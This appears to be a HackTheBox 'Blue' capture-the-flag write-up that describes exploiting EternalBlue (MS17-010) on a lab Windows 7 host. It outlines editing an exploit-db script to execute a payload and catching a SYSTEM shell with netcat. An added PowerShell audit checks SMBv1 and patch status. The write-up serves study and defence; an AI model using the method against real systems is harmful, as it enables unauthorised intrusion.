Introduction
This is the second machine that I am solving today as part of the HackTheBox series. The name Blue usually resonates with EternalBlue, and since this is a Windows machine, the odds are high that it is vulnerable to EternalBlue.
Scanning & Enumeration
Target IP: 10.10.10.40
Nmap Command
From the results above, we see that only Samba is being run on the target machine, with the software version being:
`Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)`.
Samba Enumeration

We see both our favorites here, and since this is OSCP-based, let’s go ahead with exploit-db.
Vulnerability Analysis

As we can see, this is remotely exploitable.
Exploitation
Let’s get started; first, let’s download the exploit to our local machine.
As far as I remember, I have encountered a similar machine before on TryHackMe; here’s the link if anyone’s interested.
Let’s download the exploit
Let’s look at the source code.

An import for `mysmb` is required, which we can download using the link in the exploit.
Next, we see that our Windows machine name pops up on the list.
And finally, we see that we have an option to add a username and password to the script.
Let’s go ahead and download this dependency first.
Next, let us generate our payload.
Looking at the code further ahead, we see that finding the pipe name is not really necessary.
Finally, while reading the `smb_pwn` function we come across the snippet where we have access to the system, but the code that sends our payload and executes it on the target machine has been commented out. Let’s remove that and send our regards ;)
Let’s start our netcat and then wait :D
We ran into errors saying that:

Looking back at the source code, I realized that the username was left blank, so I added ‘guest’ as a username and then ran the script again.
It failed again!

This suggested that maybe the source code was written for Python 2 instead of Python 3. Even though Python 2 has reached its end of life and is no longer supported, we still encounter a lot of code out there that uses it.
I ran the script again, and it failed again!
But this time I was sure that there was no other change to be made, so I ran the script again, and voila! Oops, the magic word is BOOOOOOOM. I have a shell with admin privileges.

Privesc
We don’t need to privesc in this scenario, since we get admin access directly.
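From the defender’s side, the reason no privilege escalation is needed is worth spelling out: the SMB service that EternalBlue (MS17-010) abuses runs as SYSTEM, so a successful exploit lands with full privileges. The host-side fix is to confirm the patch is installed and to turn SMBv1 off. The audit below is an added example of mine, not part of the original writeup or the HackTheBox machine. It assumes a Windows 7 SP1 host (the version nmap reported above) and an elevated PowerShell prompt; on that platform SMBv1 is controlled by the LanmanServer registry value rather than `Get-SmbServerConfiguration`, and the KB numbers are the March 2017 MS17-010 updates for Windows 7 SP1 as I know them (KB4012212 security-only, KB4012215 monthly rollup).

```powershell
# Added example (editor's, not from the original post). Run elevated on a
# Windows 7 SP1 / Server 2008 R2 host. Reports SMBv1 state and MS17-010 patch
# status, and shows the remediation with -WhatIf so it is safe as an audit.

$smbParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# 1. Is SMBv1 still enabled on the server side?  A missing SMB1 value means
#    "enabled" (the Windows 7 default), so treat absent and non-zero the same.
$smb1 = (Get-ItemProperty -Path $smbParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
$smb1Enabled = ($null -eq $smb1) -or ($smb1 -ne 0)

# 2. Is the MS17-010 fix present?  KB4012212 is the security-only update for
#    Windows 7 SP1; KB4012215 is the monthly rollup that also contains it.
$ms17010 = Get-HotFix -Id KB4012212, KB4012215 -ErrorAction SilentlyContinue

[pscustomobject]@{
    Host         = $env:COMPUTERNAME
    SMB1Enabled  = $smb1Enabled
    MS17010Patch = if ($ms17010) { $ms17010.HotFixID -join ', ' } else { 'MISSING' }
}

# 3. Remediation: disable SMBv1 on the server side and restart the service so
#    the change takes effect.  Remove -WhatIf to actually apply it.
if ($smb1Enabled) {
    Set-ItemProperty -Path $smbParams -Name SMB1 -Type DWORD -Value 0 -Force -WhatIf
    Restart-Service -Name LanmanServer -Force -WhatIf
}
```

A host that reports `SMB1Enabled: True` together with `MS17010Patch: MISSING` is in exactly the state the writeup above exploits. Disabling SMBv1 breaks clients that only speak SMBv1 (very old scanners and NAS boxes), which is why the script only previews the change; patching alone closes MS17-010, but SMBv1 has had further issues since, so both steps are the usual recommendation.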
Summary | TL;DR
- Scan ports using nmap
- Find the vulnerable Samba service
- Exploit EternalBlue
Parting Thoughts
In this machine, we learned the following:
- Sometimes the script won’t work on the first go, even if you did everything correctly, and I guess it’s fine; maybe it’s part of the whole Try Harder mantra that we see out there.
Thank you for reading, please provide your feedback and share with people who are in need. :)